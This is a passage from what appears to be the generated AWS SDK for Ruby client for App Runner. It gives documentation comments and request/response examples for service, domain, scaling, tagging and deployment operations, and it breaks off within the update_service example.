# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DeleteService AWS API Documentation
#
# @overload delete_service(params = {})
# @param [Hash] params ({})
def delete_service(params = {}, options = {})
req = build_request(:delete_service, params)
req.send_request(options)
end
# Return a full description of an AWS App Runner automatic scaling
# configuration resource.
#
# @option params [required, String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of the App Runner auto scaling
# configuration that you want a description for.
#
# The ARN can be a full auto scaling configuration ARN, or a partial ARN
# ending with either `.../name ` or `.../name/revision `. If a revision
# isn't specified, the latest active revision is described.
#
# @return [Types::DescribeAutoScalingConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeAutoScalingConfigurationResponse#auto_scaling_configuration #auto_scaling_configuration} => Types::AutoScalingConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.describe_auto_scaling_configuration({
# auto_scaling_configuration_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration.auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_revision #=> Integer
# resp.auto_scaling_configuration.latest #=> Boolean
# resp.auto_scaling_configuration.status #=> String, one of "ACTIVE", "INACTIVE"
# resp.auto_scaling_configuration.max_concurrency #=> Integer
# resp.auto_scaling_configuration.min_size #=> Integer
# resp.auto_scaling_configuration.max_size #=> Integer
# resp.auto_scaling_configuration.created_at #=> Time
# resp.auto_scaling_configuration.deleted_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DescribeAutoScalingConfiguration AWS API Documentation
#
# @overload describe_auto_scaling_configuration(params = {})
# @param [Hash] params ({})
def describe_auto_scaling_configuration(params = {}, options = {})
req = build_request(:describe_auto_scaling_configuration, params)
req.send_request(options)
end
# Return a description of custom domain names that are associated with
# an AWS App Runner service.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# associated custom domain names to be described for.
#
# @option params [String] :next_token
# A token from a previous result page. It's used for a paginated
# request. The request retrieves the next result page. All other
# parameter values must be identical to the ones that are specified in
# the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @option params [Integer] :max_results
# The maximum number of results that each response (result page) can
# include. It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @return [Types::DescribeCustomDomainsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeCustomDomainsResponse#dns_target #dns_target} => String
# * {Types::DescribeCustomDomainsResponse#service_arn #service_arn} => String
# * {Types::DescribeCustomDomainsResponse#custom_domains #custom_domains} => Array<Types::CustomDomain>
# * {Types::DescribeCustomDomainsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.describe_custom_domains({
# service_arn: "AppRunnerResourceArn", # required
# next_token: "String",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.dns_target #=> String
# resp.service_arn #=> String
# resp.custom_domains #=> Array
# resp.custom_domains[0].domain_name #=> String
# resp.custom_domains[0].enable_www_subdomain #=> Boolean
# resp.custom_domains[0].certificate_validation_records #=> Array
# resp.custom_domains[0].certificate_validation_records[0].name #=> String
# resp.custom_domains[0].certificate_validation_records[0].type #=> String
# resp.custom_domains[0].certificate_validation_records[0].value #=> String
# resp.custom_domains[0].certificate_validation_records[0].status #=> String, one of "PENDING_VALIDATION", "SUCCESS", "FAILED"
# resp.custom_domains[0].status #=> String, one of "CREATING", "CREATE_FAILED", "ACTIVE", "DELETING", "DELETE_FAILED", "PENDING_CERTIFICATE_DNS_VALIDATION", "BINDING_CERTIFICATE"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DescribeCustomDomains AWS API Documentation
#
# @overload describe_custom_domains(params = {})
# @param [Hash] params ({})
def describe_custom_domains(params = {}, options = {})
req = build_request(:describe_custom_domains, params)
req.send_request(options)
end
# Return a full description of an AWS App Runner service.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# a description for.
#
# @return [Types::DescribeServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeServiceResponse#service #service} => Types::Service
#
# @example Request syntax with placeholder values
#
# resp = client.describe_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DescribeService AWS API Documentation
#
# @overload describe_service(params = {})
# @param [Hash] params ({})
def describe_service(params = {}, options = {})
req = build_request(:describe_service, params)
req.send_request(options)
end
# Disassociate a custom domain name from an AWS App Runner service.
#
# Certificates tracking domain validity are associated with a custom
# domain and are stored in [AWS Certificate Manager (ACM)][1]. These
# certificates aren't deleted as part of this action. App Runner delays
# certificate deletion for 30 days after a domain is disassociated from
# your service.
#
#
#
# [1]: https://docs.aws.amazon.com/acm/latest/userguide
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to disassociate a custom domain name from.
#
# @option params [required, String] :domain_name
# The domain name that you want to disassociate from the App Runner
# service.
#
# @return [Types::DisassociateCustomDomainResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DisassociateCustomDomainResponse#dns_target #dns_target} => String
# * {Types::DisassociateCustomDomainResponse#service_arn #service_arn} => String
# * {Types::DisassociateCustomDomainResponse#custom_domain #custom_domain} => Types::CustomDomain
#
# @example Request syntax with placeholder values
#
# resp = client.disassociate_custom_domain({
# service_arn: "AppRunnerResourceArn", # required
# domain_name: "DomainName", # required
# })
#
# @example Response structure
#
# resp.dns_target #=> String
# resp.service_arn #=> String
# resp.custom_domain.domain_name #=> String
# resp.custom_domain.enable_www_subdomain #=> Boolean
# resp.custom_domain.certificate_validation_records #=> Array
# resp.custom_domain.certificate_validation_records[0].name #=> String
# resp.custom_domain.certificate_validation_records[0].type #=> String
# resp.custom_domain.certificate_validation_records[0].value #=> String
# resp.custom_domain.certificate_validation_records[0].status #=> String, one of "PENDING_VALIDATION", "SUCCESS", "FAILED"
# resp.custom_domain.status #=> String, one of "CREATING", "CREATE_FAILED", "ACTIVE", "DELETING", "DELETE_FAILED", "PENDING_CERTIFICATE_DNS_VALIDATION", "BINDING_CERTIFICATE"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DisassociateCustomDomain AWS API Documentation
#
# @overload disassociate_custom_domain(params = {})
# @param [Hash] params ({})
def disassociate_custom_domain(params = {}, options = {})
req = build_request(:disassociate_custom_domain, params)
req.send_request(options)
end
# Returns a list of AWS App Runner automatic scaling configurations in
# your AWS account. You can query the revisions for a specific
# configuration name or the revisions for all configurations in your
# account. You can optionally query only the latest revision of each
# requested name.
#
# @option params [String] :auto_scaling_configuration_name
# The name of the App Runner auto scaling configuration that you want to
# list. If specified, App Runner lists revisions that share this name.
# If not specified, App Runner returns revisions of all configurations.
#
# @option params [Boolean] :latest_only
# Set to `true` to list only the latest revision for each requested
# configuration name.
#
# Keep as `false` to list all revisions for each requested configuration
# name.
#
# Default: `false`
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @option params [String] :next_token
# A token from a previous result page. It's used for a paginated
# request. The request retrieves the next result page. All other
# parameter values must be identical to the ones that are specified in
# the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @return [Types::ListAutoScalingConfigurationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListAutoScalingConfigurationsResponse#auto_scaling_configuration_summary_list #auto_scaling_configuration_summary_list} => Array<Types::AutoScalingConfigurationSummary>
# * {Types::ListAutoScalingConfigurationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_auto_scaling_configurations({
# auto_scaling_configuration_name: "AutoScalingConfigurationName",
# latest_only: false,
# max_results: 1,
# next_token: "NextToken",
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration_summary_list #=> Array
# resp.auto_scaling_configuration_summary_list[0].auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration_summary_list[0].auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration_summary_list[0].auto_scaling_configuration_revision #=> Integer
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListAutoScalingConfigurations AWS API Documentation
#
# @overload list_auto_scaling_configurations(params = {})
# @param [Hash] params ({})
def list_auto_scaling_configurations(params = {}, options = {})
req = build_request(:list_auto_scaling_configurations, params)
req.send_request(options)
end
# Returns a list of AWS App Runner connections that are associated with
# your AWS account.
#
# @option params [String] :connection_name
# If specified, only this connection is returned. If not specified, the
# result isn't filtered by name.
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). Used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @option params [String] :next_token
# A token from a previous result page. Used for a paginated request. The
# request retrieves the next result page. All other parameter values
# must be identical to the ones specified in the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @return [Types::ListConnectionsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListConnectionsResponse#connection_summary_list #connection_summary_list} => Array<Types::ConnectionSummary>
# * {Types::ListConnectionsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_connections({
# connection_name: "ConnectionName",
# max_results: 1,
# next_token: "NextToken",
# })
#
# @example Response structure
#
# resp.connection_summary_list #=> Array
# resp.connection_summary_list[0].connection_name #=> String
# resp.connection_summary_list[0].connection_arn #=> String
# resp.connection_summary_list[0].provider_type #=> String, one of "GITHUB"
# resp.connection_summary_list[0].status #=> String, one of "PENDING_HANDSHAKE", "AVAILABLE", "ERROR", "DELETED"
# resp.connection_summary_list[0].created_at #=> Time
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListConnections AWS API Documentation
#
# @overload list_connections(params = {})
# @param [Hash] params ({})
def list_connections(params = {}, options = {})
req = build_request(:list_connections, params)
req.send_request(options)
end
# Return a list of operations that occurred on an AWS App Runner
# service.
#
# The resulting list of OperationSummary objects is sorted in reverse
# chronological order. The first object on the list represents the last
# started operation.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# a list of operations for.
#
# @option params [String] :next_token
# A token from a previous result page. It's used for a paginated
# request. The request retrieves the next result page. All other
# parameter values must be identical to the ones specified in the
# initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @return [Types::ListOperationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListOperationsResponse#operation_summary_list #operation_summary_list} => Array<Types::OperationSummary>
# * {Types::ListOperationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_operations({
# service_arn: "AppRunnerResourceArn", # required
# next_token: "String",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.operation_summary_list #=> Array
# resp.operation_summary_list[0].id #=> String
# resp.operation_summary_list[0].type #=> String, one of "START_DEPLOYMENT", "CREATE_SERVICE", "PAUSE_SERVICE", "RESUME_SERVICE", "DELETE_SERVICE"
# resp.operation_summary_list[0].status #=> String, one of "PENDING", "IN_PROGRESS", "FAILED", "SUCCEEDED", "ROLLBACK_IN_PROGRESS", "ROLLBACK_FAILED", "ROLLBACK_SUCCEEDED"
# resp.operation_summary_list[0].target_arn #=> String
# resp.operation_summary_list[0].started_at #=> Time
# resp.operation_summary_list[0].ended_at #=> Time
# resp.operation_summary_list[0].updated_at #=> Time
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListOperations AWS API Documentation
#
# @overload list_operations(params = {})
# @param [Hash] params ({})
def list_operations(params = {}, options = {})
req = build_request(:list_operations, params)
req.send_request(options)
end
# Returns a list of running AWS App Runner services in your AWS account.
#
# @option params [String] :next_token
# A token from a previous result page. Used for a paginated request. The
# request retrieves the next result page. All other parameter values
# must be identical to the ones specified in the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @option params [Integer] :max_results
# The maximum number of results to include in each response (result
# page). It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @return [Types::ListServicesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListServicesResponse#service_summary_list #service_summary_list} => Array<Types::ServiceSummary>
# * {Types::ListServicesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_services({
# next_token: "String",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.service_summary_list #=> Array
# resp.service_summary_list[0].service_name #=> String
# resp.service_summary_list[0].service_id #=> String
# resp.service_summary_list[0].service_arn #=> String
# resp.service_summary_list[0].service_url #=> String
# resp.service_summary_list[0].created_at #=> Time
# resp.service_summary_list[0].updated_at #=> Time
# resp.service_summary_list[0].status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListServices AWS API Documentation
#
# @overload list_services(params = {})
# @param [Hash] params ({})
def list_services(params = {}, options = {})
req = build_request(:list_services, params)
req.send_request(options)
end
    # List tags that are associated with an AWS App Runner resource. The
    # response contains a list of tag key-value pairs.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource that a tag list is
# requested for.
#
# It must be the ARN of an App Runner resource.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Array<Types::Tag>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.tags #=> Array
# resp.tags[0].key #=> String
# resp.tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Pause an active AWS App Runner service. App Runner reduces compute
# capacity for the service to zero and loses state (for example,
# ephemeral storage is removed).
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to pause.
#
# @return [Types::PauseServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PauseServiceResponse#service #service} => Types::Service
# * {Types::PauseServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.pause_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/PauseService AWS API Documentation
#
# @overload pause_service(params = {})
# @param [Hash] params ({})
def pause_service(params = {}, options = {})
req = build_request(:pause_service, params)
req.send_request(options)
end
# Resume an active AWS App Runner service. App Runner provisions compute
# capacity for the service.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to resume.
#
# @return [Types::ResumeServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ResumeServiceResponse#service #service} => Types::Service
# * {Types::ResumeServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.resume_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/ResumeService AWS API Documentation
#
# @overload resume_service(params = {})
# @param [Hash] params ({})
def resume_service(params = {}, options = {})
req = build_request(:resume_service, params)
req.send_request(options)
end
# Initiate a manual deployment of the latest commit in a source code
# repository or the latest image in a source image repository to an AWS
# App Runner service.
#
# For a source code repository, App Runner retrieves the commit and
# builds a Docker image. For a source image repository, App Runner
# retrieves the latest Docker image. In both cases, App Runner then
# deploys the new image to your service and starts a new container
# instance.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to manually deploy to.
#
# @return [Types::StartDeploymentResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartDeploymentResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.start_deployment({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/StartDeployment AWS API Documentation
#
# @overload start_deployment(params = {})
# @param [Hash] params ({})
def start_deployment(params = {}, options = {})
req = build_request(:start_deployment, params)
req.send_request(options)
end
# Add tags to, or update the tag values of, an App Runner resource. A
# tag is a key-value pair.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource that you want to update
# tags for.
#
# It must be the ARN of an App Runner resource.
#
# @option params [required, Array<Types::Tag>] :tags
# A list of tag key-value pairs to add or update. If a key is new to the
# resource, the tag is added with the provided value. If a key is
# already associated with the resource, the value of the tag is updated.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "AppRunnerResourceArn", # required
# tags: [ # required
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Remove tags from an App Runner resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource that you want to remove
# tags from.
#
# It must be the ARN of an App Runner resource.
#
# @option params [required, Array<String>] :tag_keys
# A list of tag keys that you want to remove.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "AppRunnerResourceArn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Update an AWS App Runner service. You can update the source
# configuration and instance configuration of the service. You can also
# update the ARN of the auto scaling configuration resource that's
# associated with the service. However, you can't change the name or
# the encryption configuration of the service. These can be set only
# when you create the service.
#
# To update the tags applied to your service, use the separate actions
# TagResource and UntagResource.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to update.
#
# @option params [Types::SourceConfiguration] :source_configuration
# The source configuration to apply to the App Runner service.
#
# You can change the configuration of the code or image repository that
# the service uses. However, you can't switch from code to image or the
# other way around. This means that you must provide the same structure
# member of `SourceConfiguration` that you originally included when you
# created the service. Specifically, you can include either
# `CodeRepository` or `ImageRepository`. To update the source
# configuration, set the values to members of the structure that you
# include.
#
# @option params [Types::InstanceConfiguration] :instance_configuration
# The runtime configuration to apply to instances (scaling units) of the
# App Runner service.
#
# @option params [String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of an App Runner automatic scaling
# configuration resource that you want to associate with your service.
#
# @option params [Types::HealthCheckConfiguration] :health_check_configuration
# The settings for the health check that AWS App Runner performs to
# monitor the health of your service.
#
# @return [Types::UpdateServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateServiceResponse#service #service} => Types::Service
# * {Types::UpdateServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.update_service({
# service_arn: "AppRunnerResourceArn", # required
# source_configuration: {
# code_repository: {
# repository_url: "String", # required
# source_code_version: { # required
# type: "BRANCH", # required, accepts BRANCH
